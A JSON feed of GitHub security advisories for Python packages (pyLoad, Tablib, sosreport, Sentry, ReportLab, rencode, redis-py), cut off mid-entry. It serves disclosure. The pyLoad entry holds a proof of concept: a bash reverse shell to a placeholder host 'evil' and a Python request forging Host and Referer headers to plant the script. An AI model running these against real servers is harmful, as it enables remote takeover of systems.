{
    "version": "https://jsonfeed.org/version/1",
    "title": "Security Advisory for Python packages hosted at PyPI.org",
    "home_page_url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip",
    "feed_url": "https://azu.github.io/github-advisory-database-rss/pip.json",
    "description": "Security Advisory for Python packages hosted at PyPI.org on GitHub",
    "items": [
        {
            "content_html": "<h3 id=\"summary\">Summary</h3>\n<p>The folder <code>/.pyload/scripts</code> has scripts which are run when certain actions are completed, for e.g. a download is finished. By downloading a executable file to a folder in /scripts and performing the respective action, remote code execution can be achieved. A file can be downloaded to such a folder by changing the download folder to a folder in <code>/scripts</code> path and using the <code>/flashgot</code> API to download the file.</p>\n<h3 id=\"details\">Details</h3>\n<p><strong>Configuration changes</strong></p>\n<ol>\n<li>Change the download folder to <code>/home/&lt;user&gt;/.pyload/scripts</code></li>\n<li>Change permissions for downloaded files:<ol>\n<li>Change permissions of downloads: on</li>\n<li>Permission mode for downloaded files: 0744</li>\n</ol>\n</li>\n</ol>\n<p><strong>Making the request to download files</strong></p>\n<p>The <code>flashgot</code> API provides functionality to download files from a provided URL. Although pyload tries to prevent non-local requests from being able to reach this API, it relies on checking the Host header and the Referer header of the incoming request. Both of these can be set by an attacker to arbitrary values, thereby bypassing these checks.</p>\n<p><em>Referer header check</em></p>\n<pre><code>def flashgot():\n    if flask.request.referrer not in (\n        \"http://localhost:9666/flashgot\",\n        \"http://127.0.0.1:9666/flashgot\",\n    ):\n        flask.abort(500)\n  ...\n</code></pre>\n<p><em>Host header check for local check</em></p>\n<pre><code>def local_check(func):\n    @wraps(func)\n    def wrapper(*args, **kwargs):\n        remote_addr = flask.request.environ.get(\"REMOTE_ADDR\", \"0\")\n        http_host = flask.request.environ.get(\"HTTP_HOST\", \"0\")\n\n        if remote_addr in (\"127.0.0.1\", \"::ffff:127.0.0.1\", \"::1\", \"localhost\") or http_host in (\n            \"127.0.0.1:9666\",\n            \"[::1]:9666\",\n        ):\n            return func(*args, **kwargs)\n        else:\n            return \"Forbidden\", 403\n\n    return wrapper\n</code></pre>\n<p>Once the file is downloaded to a folder in the scripts folder, the attacker can perform the respective action, and the script will be executed</p>\n<h3 id=\"poc\">PoC</h3>\n<p>Create a malicious file. I have created a reverse shell</p>\n<pre><code>#!/bin/bash\nbash -i &gt;&amp; /dev/tcp/evil/9002 0&gt;&amp;1\n</code></pre>\n<p>Host this file at some URL, for eg: <a href=\"http://evil\">http://evil</a></p>\n<p>Create a request like this for the <code>flashgot</code> API. I am using <code>download_finished</code> folder as the destination folder. Scripts in this folder are run when a download is completed.</p>\n<pre><code>import requests\n\nurl = \"http://pyload/flashgot\"\nheaders = {\"host\": \"127.0.0.1:9666\", \"Referer\": \"http://127.0.0.1:9666/flashgot\"}\n\ndata = {\n    \"package\": \"download_finished\",  \n    \"passwords\": \"optional_password\",  \n    \"urls\": \"http://evil/exp.sh\",\n    \"autostart\": 1,\n}\n\n\nresponse = requests.post(url, data=data, headers=headers)\n</code></pre>\n<p>When the above request is made, exp.sh will be downloaded to <code>/scripts/download_finished folder</code>. For all subsequent downloads, this script will be run. Sending the request again causes a download of the file again, and when the download is complete, the script is run.</p>\n<p>I also have a listener on my machine which receives the request from the pyload server. When the script executes, I get a connection back to my machine</p>\n<h3 id=\"screenshots\">Screenshots</h3>\n<p><em>Download folder</em></p>\n<img src=\"https://github.com/user-attachments/assets/77fc5202-bed2-41a2-98ae-9cb7b1315f76\" alt=\"1\" width=\"672\">\n\n<p><em><code>exp.sh</code> is downloaded</em></p>\n<img src=\"https://github.com/user-attachments/assets/5e6e19db-2a5c-48f4-9973-817528b5b9ec\" alt=\"2\" width=\"714\">\n\n<p><em>Script is run</em></p>\n<img src=\"https://github.com/user-attachments/assets/34fbdaee-50ba-46a8-a372-ec8c91d03aa9\" alt=\"3\" width=\"714\">\n\n<p><em>Reverse shell connection is received</em></p>\n<img src=\"https://github.com/user-attachments/assets/4713d56e-e850-47ad-99b3-cab0c7bba800\" alt=\"4\" width=\"314\">\n\n\n<h3 id=\"impact\">Impact</h3>\n<p>This vulnerability allows an attacker with access to change the settings on a pyload server to execute arbitrary code and completely compromise the system</p>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://github.com/pyload/pyload/security/advisories/GHSA-w7hq-f2pj-c53g\">https://github.com/pyload/pyload/security/advisories/GHSA-w7hq-f2pj-c53g</a></li>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2024-47821\">https://nvd.nist.gov/vuln/detail/CVE-2024-47821</a></li>\n<li><a href=\"https://github.com/pyload/pyload/commit/48f59567393a19263c8a0285256a7537dc9ce109\">https://github.com/pyload/pyload/commit/48f59567393a19263c8a0285256a7537dc9ce109</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-w7hq-f2pj-c53g\">https://github.com/advisories/GHSA-w7hq-f2pj-c53g</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-w7hq-f2pj-c53g",
            "title": "[pyload-ng] pyLoad vulnerable to remote code execution by download to /.pyload/scripts using /flashgot API",
            "date_modified": "2024-10-28T12:24:45.000Z",
            "date_published": "2024-10-28T12:23:29.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-w7hq-f2pj-c53g"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<p>An exploitable vulnerability exists in the Databook loading functionality of Tablib 0.11.4. A yaml loaded Databook can execute arbitrary python commands resulting in command execution. An attacker can insert python into loaded yaml to trigger this vulnerability.</p>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2017-2810\">https://nvd.nist.gov/vuln/detail/CVE-2017-2810</a></li>\n<li><a href=\"https://security.gentoo.org/glsa/201811-18\">https://security.gentoo.org/glsa/201811-18</a></li>\n<li><a href=\"https://talosintelligence.com/vulnerability_reports/TALOS-2017-0307\">https://talosintelligence.com/vulnerability_reports/TALOS-2017-0307</a></li>\n<li><a href=\"https://github.com/jazzband/tablib/commit/69abfc3ada5d754cb152119c0b4777043657cb6e\">https://github.com/jazzband/tablib/commit/69abfc3ada5d754cb152119c0b4777043657cb6e</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-gcr6-rf47-jrgf\">https://github.com/advisories/GHSA-gcr6-rf47-jrgf</a></li>\n<li><a href=\"https://github.com/pypa/advisory-database/tree/main/vulns/tablib/PYSEC-2017-95.yaml\">https://github.com/pypa/advisory-database/tree/main/vulns/tablib/PYSEC-2017-95.yaml</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-gcr6-rf47-jrgf",
            "title": "[tablib] Loaded Databook of Tablib prone to python insertion resulting in command execution",
            "date_modified": "2024-10-27T15:36:24.000Z",
            "date_published": "2018-07-13T16:01:25.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-gcr6-rf47-jrgf"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<p>sosreport in SoS 3.x allows local users to obtain sensitive information from sosreport files or gain privileges via a symlink attack on an archive file in a temporary directory, as demonstrated by <code>sosreport-$hostname-$date.tar</code> in <code>/tmp/sosreport-$hostname-$date</code>.</p>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2015-7529\">https://nvd.nist.gov/vuln/detail/CVE-2015-7529</a></li>\n<li><a href=\"https://github.com/sosreport/sos/issues/696\">https://github.com/sosreport/sos/issues/696</a></li>\n<li><a href=\"https://access.redhat.com/errata/RHSA-2016:0152\">https://access.redhat.com/errata/RHSA-2016:0152</a></li>\n<li><a href=\"https://access.redhat.com/errata/RHSA-2016:0188\">https://access.redhat.com/errata/RHSA-2016:0188</a></li>\n<li><a href=\"https://bugzilla.redhat.com/show_bug.cgi?id=1282542\">https://bugzilla.redhat.com/show_bug.cgi?id=1282542</a></li>\n<li><a href=\"http://rhn.redhat.com/errata/RHSA-2016-0152.html\">http://rhn.redhat.com/errata/RHSA-2016-0152.html</a></li>\n<li><a href=\"http://rhn.redhat.com/errata/RHSA-2016-0188.html\">http://rhn.redhat.com/errata/RHSA-2016-0188.html</a></li>\n<li><a href=\"http://www.ubuntu.com/usn/USN-2845-1\">http://www.ubuntu.com/usn/USN-2845-1</a></li>\n<li><a href=\"https://access.redhat.com/security/cve/CVE-2015-7529\">https://access.redhat.com/security/cve/CVE-2015-7529</a></li>\n<li><a href=\"https://web.archive.org/web/20160416033632/http://www.securityfocus.com/bid/83162\">https://web.archive.org/web/20160416033632/http://www.securityfocus.com/bid/83162</a></li>\n<li><a href=\"https://github.com/pypa/advisory-database/tree/main/vulns/sosreport/PYSEC-2017-73.yaml\">https://github.com/pypa/advisory-database/tree/main/vulns/sosreport/PYSEC-2017-73.yaml</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-3g56-2hh3-35ph\">https://github.com/advisories/GHSA-3g56-2hh3-35ph</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-3g56-2hh3-35ph",
            "title": "[sosreport] SoSReport Predictable Tmp File Names",
            "date_modified": "2024-10-27T15:34:14.000Z",
            "date_published": "2022-05-13T01:54:05.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-3g56-2hh3-35ph"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<h3 id=\"impact\">Impact</h3>\n<p>An authenticated user can download a debug or artifact bundle from arbitrary organizations and projects with a known bundle ID. The user does not need to be a member of the organization or have permissions on the project.</p>\n<h3 id=\"patches\">Patches</h3>\n<p>A patch was issued to ensure authorization checks are properly scoped on requests to retrieve debug or artifact bundles. Authenticated users who do not have the necessary permissions on the particular project are no longer able to download them.</p>\n<p><strong>Sentry SaaS users do not need to take any action. <a href=\"https://github.com/getsentry/self-hosted\">Self-Hosted Sentry</a> users should upgrade to version 23.5.2 or higher.</strong></p>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://github.com/getsentry/sentry/pull/49680\">Restrict file downloads to Project</a></li>\n</ul>\n<h3 id=\"references-1\">References</h3>\n<ul>\n<li><a href=\"https://github.com/getsentry/sentry/security/advisories/GHSA-m4hc-m2v6-hfw8\">https://github.com/getsentry/sentry/security/advisories/GHSA-m4hc-m2v6-hfw8</a></li>\n<li><a href=\"https://github.com/getsentry/sentry/pull/49680\">https://github.com/getsentry/sentry/pull/49680</a></li>\n<li><a href=\"https://github.com/getsentry/sentry/commit/e932b15435bf36239431eaa3790a6bcfa47046a9\">https://github.com/getsentry/sentry/commit/e932b15435bf36239431eaa3790a6bcfa47046a9</a></li>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2023-36826\">https://nvd.nist.gov/vuln/detail/CVE-2023-36826</a></li>\n<li><a href=\"https://github.com/pypa/advisory-database/tree/main/vulns/sentry/PYSEC-2023-130.yaml\">https://github.com/pypa/advisory-database/tree/main/vulns/sentry/PYSEC-2023-130.yaml</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-m4hc-m2v6-hfw8\">https://github.com/advisories/GHSA-m4hc-m2v6-hfw8</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-m4hc-m2v6-hfw8",
            "title": "[sentry] Improper authorization on debug and artifact file downloads",
            "date_modified": "2024-10-26T22:53:44.000Z",
            "date_published": "2023-07-25T17:19:48.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-m4hc-m2v6-hfw8"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<p>python-requests-Kerberos through 0.5 does not handle mutual authentication</p>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2014-8650\">https://nvd.nist.gov/vuln/detail/CVE-2014-8650</a></li>\n<li><a href=\"https://github.com/requests/requests-kerberos/issues/35\">https://github.com/requests/requests-kerberos/issues/35</a></li>\n<li><a href=\"https://github.com/requests/requests-kerberos/pull/36\">https://github.com/requests/requests-kerberos/pull/36</a></li>\n<li><a href=\"https://github.com/mkomitee/requests-kerberos/commit/9c1e08cc17bb6950455a85d33d391ecd2bce6eb6\">https://github.com/mkomitee/requests-kerberos/commit/9c1e08cc17bb6950455a85d33d391ecd2bce6eb6</a></li>\n<li><a href=\"https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2014-8650\">https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2014-8650</a></li>\n<li><a href=\"https://github.com/requests/requests-kerberos/blob/0.6/HISTORY.rst\">https://github.com/requests/requests-kerberos/blob/0.6/HISTORY.rst</a></li>\n<li><a href=\"https://security-tracker.debian.org/tracker/CVE-2014-8650\">https://security-tracker.debian.org/tracker/CVE-2014-8650</a></li>\n<li><a href=\"http://www.openwall.com/lists/oss-security/2014/11/07/1\">http://www.openwall.com/lists/oss-security/2014/11/07/1</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-wh37-37xw-54hr\">https://github.com/advisories/GHSA-wh37-37xw-54hr</a></li>\n<li><a href=\"https://github.com/pypa/advisory-database/tree/main/vulns/requests-kerberos/PYSEC-2019-200.yaml\">https://github.com/pypa/advisory-database/tree/main/vulns/requests-kerberos/PYSEC-2019-200.yaml</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-wh37-37xw-54hr",
            "title": "[requests-kerberos] Improper Authentication in requests-kerberos",
            "date_modified": "2024-10-26T22:45:18.000Z",
            "date_published": "2020-03-10T18:02:31.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-wh37-37xw-54hr"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<p>Salt (aka SaltStack) before 0.15.0 through 0.17.0 allows remote authenticated minions to impersonate arbitrary minions via a crafted minion with a valid key.</p>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2013-4439\">https://nvd.nist.gov/vuln/detail/CVE-2013-4439</a></li>\n<li><a href=\"https://github.com/saltstack/salt/pull/7356\">https://github.com/saltstack/salt/pull/7356</a></li>\n<li><a href=\"http://www.openwall.com/lists/oss-security/2013/10/18/3\">http://www.openwall.com/lists/oss-security/2013/10/18/3</a></li>\n<li><a href=\"https://github.com/pypa/advisory-database/tree/main/vulns/salt/PYSEC-2013-14.yaml\">https://github.com/pypa/advisory-database/tree/main/vulns/salt/PYSEC-2013-14.yaml</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-jmv9-5gx8-7xpf\">https://github.com/advisories/GHSA-jmv9-5gx8-7xpf</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-jmv9-5gx8-7xpf",
            "title": "[salt] Minion identity not validated in saltstack",
            "date_modified": "2024-10-26T22:43:28.000Z",
            "date_published": "2022-05-17T04:58:30.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-jmv9-5gx8-7xpf"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<p>It was found that python-rsa is vulnerable to Bleichenbacher timing attacks. An attacker can use this flaw via the RSA decryption API to decrypt parts of the cipher text encrypted with RSA</p>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2020-25658\">https://nvd.nist.gov/vuln/detail/CVE-2020-25658</a></li>\n<li><a href=\"https://github.com/sybrenstuvel/python-rsa/issues/165\">https://github.com/sybrenstuvel/python-rsa/issues/165</a></li>\n<li><a href=\"https://github.com/sybrenstuvel/python-rsa/commit/dae8ce0d85478e16f2368b2341632775313d41ed\">https://github.com/sybrenstuvel/python-rsa/commit/dae8ce0d85478e16f2368b2341632775313d41ed</a></li>\n<li><a href=\"https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-25658\">https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-25658</a></li>\n<li><a href=\"https://access.redhat.com/errata/RHSA-2020:5634\">https://access.redhat.com/errata/RHSA-2020:5634</a></li>\n<li><a href=\"https://access.redhat.com/errata/RHSA-2021:0637\">https://access.redhat.com/errata/RHSA-2021:0637</a></li>\n<li><a href=\"https://access.redhat.com/errata/RHSA-2022:1716\">https://access.redhat.com/errata/RHSA-2022:1716</a></li>\n<li><a href=\"https://access.redhat.com/security/cve/CVE-2020-25658\">https://access.redhat.com/security/cve/CVE-2020-25658</a></li>\n<li><a href=\"https://bugzilla.redhat.com/show_bug.cgi?id=1889972\">https://bugzilla.redhat.com/show_bug.cgi?id=1889972</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-xrx6-fmxq-rjj2\">https://github.com/advisories/GHSA-xrx6-fmxq-rjj2</a></li>\n<li><a href=\"https://github.com/pypa/advisory-database/tree/main/vulns/rsa/PYSEC-2020-100.yaml\">https://github.com/pypa/advisory-database/tree/main/vulns/rsa/PYSEC-2020-100.yaml</a></li>\n<li><a href=\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2SAF67KDGSOHLVFTRDOHNEAFDRSSYIWA\">https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2SAF67KDGSOHLVFTRDOHNEAFDRSSYIWA</a></li>\n<li><a href=\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/APF364QJ2IYLPDNVFBOEJ24QP2WLVLJP\">https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/APF364QJ2IYLPDNVFBOEJ24QP2WLVLJP</a></li>\n<li><a href=\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QY4PJWTYSOV7ZEYZVMYIF6XRU73CY6O7\">https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QY4PJWTYSOV7ZEYZVMYIF6XRU73CY6O7</a></li>\n<li><a href=\"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2SAF67KDGSOHLVFTRDOHNEAFDRSSYIWA\">https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2SAF67KDGSOHLVFTRDOHNEAFDRSSYIWA</a></li>\n<li><a href=\"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/APF364QJ2IYLPDNVFBOEJ24QP2WLVLJP\">https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/APF364QJ2IYLPDNVFBOEJ24QP2WLVLJP</a></li>\n<li><a href=\"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QY4PJWTYSOV7ZEYZVMYIF6XRU73CY6O7\">https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QY4PJWTYSOV7ZEYZVMYIF6XRU73CY6O7</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-xrx6-fmxq-rjj2",
            "title": "[rsa] Timing attacks in python-rsa",
            "date_modified": "2024-10-26T22:33:22.000Z",
            "date_published": "2021-04-30T17:35:15.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-xrx6-fmxq-rjj2"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<p>ReportLab through 3.5.26 allows remote code execution because of toColor(eval(arg)) in colors.py, as demonstrated by a crafted XML document with '&lt;span color=\"' followed by arbitrary Python code.</p>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2019-17626\">https://nvd.nist.gov/vuln/detail/CVE-2019-17626</a></li>\n<li><a href=\"https://access.redhat.com/errata/RHSA-2020:0195\">https://access.redhat.com/errata/RHSA-2020:0195</a></li>\n<li><a href=\"https://access.redhat.com/errata/RHSA-2020:0197\">https://access.redhat.com/errata/RHSA-2020:0197</a></li>\n<li><a href=\"https://access.redhat.com/errata/RHSA-2020:0201\">https://access.redhat.com/errata/RHSA-2020:0201</a></li>\n<li><a href=\"https://access.redhat.com/errata/RHSA-2020:0230\">https://access.redhat.com/errata/RHSA-2020:0230</a></li>\n<li><a href=\"https://hg.reportlab.com/hg-public/reportlab/rev/51a521ad7dd3\">https://hg.reportlab.com/hg-public/reportlab/rev/51a521ad7dd3</a></li>\n<li><a href=\"https://lists.debian.org/debian-lts-announce/2020/02/msg00019.html\">https://lists.debian.org/debian-lts-announce/2020/02/msg00019.html</a></li>\n<li><a href=\"https://security.gentoo.org/glsa/202007-35\">https://security.gentoo.org/glsa/202007-35</a></li>\n<li><a href=\"https://www.debian.org/security/2020/dsa-4663\">https://www.debian.org/security/2020/dsa-4663</a></li>\n<li><a href=\"https://access.redhat.com/security/cve/cve-2019-17626\">https://access.redhat.com/security/cve/cve-2019-17626</a></li>\n<li><a href=\"https://web.archive.org/web/20191016111823/https://bitbucket.org/rptlab/reportlab/issues/199/eval-in-colorspy-leads-to-remote-code\">https://web.archive.org/web/20191016111823/https://bitbucket.org/rptlab/reportlab/issues/199/eval-in-colorspy-leads-to-remote-code</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-qpg2-vx7j-3869\">https://github.com/advisories/GHSA-qpg2-vx7j-3869</a></li>\n<li><a href=\"https://github.com/pypa/advisory-database/tree/main/vulns/reportlab/PYSEC-2019-117.yaml\">https://github.com/pypa/advisory-database/tree/main/vulns/reportlab/PYSEC-2019-117.yaml</a></li>\n<li><a href=\"https://usn.ubuntu.com/4273-1\">https://usn.ubuntu.com/4273-1</a></li>\n<li><a href=\"https://security.netapp.com/advisory/ntap-20240719-0006\">https://security.netapp.com/advisory/ntap-20240719-0006</a></li>\n<li><a href=\"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZZPHP2BJSTP4IYCSJRQINP763IHO6ASL\">https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZZPHP2BJSTP4IYCSJRQINP763IHO6ASL</a></li>\n<li><a href=\"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NSCTOE3DITFICY2XKBYZ5WAF5TSQ52DM\">https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NSCTOE3DITFICY2XKBYZ5WAF5TSQ52DM</a></li>\n<li><a href=\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZZPHP2BJSTP4IYCSJRQINP763IHO6ASL\">https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZZPHP2BJSTP4IYCSJRQINP763IHO6ASL</a></li>\n<li><a href=\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NSCTOE3DITFICY2XKBYZ5WAF5TSQ52DM\">https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NSCTOE3DITFICY2XKBYZ5WAF5TSQ52DM</a></li>\n<li><a href=\"https://bitbucket.org/rptlab/reportlab/src/default/CHANGES.md\">https://bitbucket.org/rptlab/reportlab/src/default/CHANGES.md</a></li>\n<li><a href=\"https://bitbucket.org/rptlab/reportlab/issues/199/eval-in-colorspy-leads-to-remote-code\">https://bitbucket.org/rptlab/reportlab/issues/199/eval-in-colorspy-leads-to-remote-code</a></li>\n<li><a href=\"http://lists.opensuse.org/opensuse-security-announce/2020-02/msg00002.html\">http://lists.opensuse.org/opensuse-security-announce/2020-02/msg00002.html</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-qpg2-vx7j-3869",
            "title": "[reportlab] XML Injection in ReportLab",
            "date_modified": "2024-10-26T22:32:16.000Z",
            "date_published": "2022-05-24T22:00:57.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-qpg2-vx7j-3869"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<p>The rencode package through 1.0.6 for Python allows an infinite loop in typecode decoding (such as via ;\\x2f\\x7f), enabling a remote attack that consumes CPU and memory.</p>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2021-40839\">https://nvd.nist.gov/vuln/detail/CVE-2021-40839</a></li>\n<li><a href=\"https://github.com/aresch/rencode/pull/29\">https://github.com/aresch/rencode/pull/29</a></li>\n<li><a href=\"https://github.com/aresch/rencode/commit/572ff74586d9b1daab904c6f7f7009ce0143bb75\">https://github.com/aresch/rencode/commit/572ff74586d9b1daab904c6f7f7009ce0143bb75</a></li>\n<li><a href=\"https://pypi.org/project/rencode/#history\">https://pypi.org/project/rencode/#history</a></li>\n<li><a href=\"https://seclists.org/fulldisclosure/2021/Sep/16\">https://seclists.org/fulldisclosure/2021/Sep/16</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-gh8j-2pgf-x458\">https://github.com/advisories/GHSA-gh8j-2pgf-x458</a></li>\n<li><a href=\"https://github.com/pypa/advisory-database/tree/main/vulns/rencode/PYSEC-2021-345.yaml\">https://github.com/pypa/advisory-database/tree/main/vulns/rencode/PYSEC-2021-345.yaml</a></li>\n<li><a href=\"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BMVQRPDVSVZNGGX57CFKCYT3DEYO4QB6\">https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BMVQRPDVSVZNGGX57CFKCYT3DEYO4QB6</a></li>\n<li><a href=\"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MCLETLGVM5DBX6QNHQFW6TWGO5T3DENY\">https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MCLETLGVM5DBX6QNHQFW6TWGO5T3DENY</a></li>\n<li><a href=\"https://security.netapp.com/advisory/ntap-20211008-0001\">https://security.netapp.com/advisory/ntap-20211008-0001</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-gh8j-2pgf-x458",
            "title": "[rencode] Infinite Loop in rencode",
            "date_modified": "2024-10-26T18:35:21.000Z",
            "date_published": "2021-09-13T20:05:51.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-gh8j-2pgf-x458"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<p>redis-py through 4.5.3 and 4.4.3 leaves a connection open after canceling an async Redis command at an inopportune time (in the case of a non-pipeline operation), and can send response data to the client of an unrelated request. NOTE: this issue exists because of an incomplete fix for CVE-2023-28858.</p>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2023-28859\">https://nvd.nist.gov/vuln/detail/CVE-2023-28859</a></li>\n<li><a href=\"https://github.com/redis/redis-py/issues/2665\">https://github.com/redis/redis-py/issues/2665</a></li>\n<li><a href=\"https://github.com/redis/redis-py/pull/2641\">https://github.com/redis/redis-py/pull/2641</a></li>\n<li><a href=\"https://github.com/redis/redis-py/pull/2666\">https://github.com/redis/redis-py/pull/2666</a></li>\n<li><a href=\"https://github.com/redis/redis-py/pull/2671\">https://github.com/redis/redis-py/pull/2671</a></li>\n<li><a href=\"https://github.com/redis/redis-py/releases/tag/v4.4.4\">https://github.com/redis/redis-py/releases/tag/v4.4.4</a></li>\n<li><a href=\"https://github.com/redis/redis-py/releases/tag/v4.5.4\">https://github.com/redis/redis-py/releases/tag/v4.5.4</a></li>\n<li><a href=\"https://github.com/pypa/advisory-database/tree/main/vulns/redis/PYSEC-2023-46.yaml\">https://github.com/pypa/advisory-database/tree/main/vulns/redis/PYSEC-2023-46.yaml</a></li>\n<li><a href=\"https://github.com/redis/redis-py/pull/1899\">https://github.com/redis/redis-py/pull/1899</a></li>\n<li><a href=\"https://github.com/redis/redis-py/commit/66a4d6b2a493dd3a20cc299ab5fef3c14baad965\">https://github.com/redis/redis-py/commit/66a4d6b2a493dd3a20cc299ab5fef3c14baad965</a></li>\n<li><a href=\"https://github.com/redis/redis-py/commit/b3c89acd0ffe8303649ad8207bc911b1d6a033eb\">https://github.com/redis/redis-py/commit/b3c89acd0ffe8303649ad8207bc911b1d6a033eb</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-8fww-64cx-x8p5\">https://github.com/advisories/GHSA-8fww-64cx-x8p5</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-8fww-64cx-x8p5",
            "title": "[redis] redis-py Race Condition due to incomplete fix",
            "date_modified": "2024-10-25T21:45:10.000Z",
            "date_published": "2023-03-26T21:30:23.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-8fww-64cx-x8p5"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<p>redis-py through 4.5.3 and 4.4.3 leaves a connection open after canceling an async Redis command at an inopportune time (in the case of a non-pipeline operation), and can send response data to the client of an unrelated request. NOTE: this issue exists because of an incomplete fix for CVE-2023-28858.</p>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2023-28859\">https://nvd.nist.gov/vuln/detail/CVE-2023-28859</a></li>\n<li><a href=\"https://github.com/redis/redis-py/issues/2665\">https://github.com/redis/redis-py/issues/2665</a></li>\n<li><a href=\"https://github.com/redis/redis-py/pull/2641\">https://github.com/redis/redis-py/pull/2641</a></li>\n<li><a href=\"https://github.com/redis/redis-py/pull/2666\">https://github.com/redis/redis-py/pull/2666</a></li>\n<li><a href=\"https://github.com/redis/redis-py/pull/2671\">https://github.com/redis/redis-py/pull/2671</a></li>\n<li><a href=\"https://github.com/redis/redis-py/releases/tag/v4.4.4\">https://github.com/redis/redis-py/releases/tag/v4.4.4</a></li>\n<li><a href=\"https://github.com/redis/redis-py/releases/tag/v4.5.4\">https://github.com/redis/redis-py/releases/tag/v4.5.4</a></li>\n<li><a href=\"https://github.com/pypa/advisory-database/tree/main/vulns/redis/PYSEC-2023-46.yaml\">https://github.com/pypa/advisory-database/tree/main/vulns/redis/PYSEC-2023-46.yaml</a></li>\n<li><a 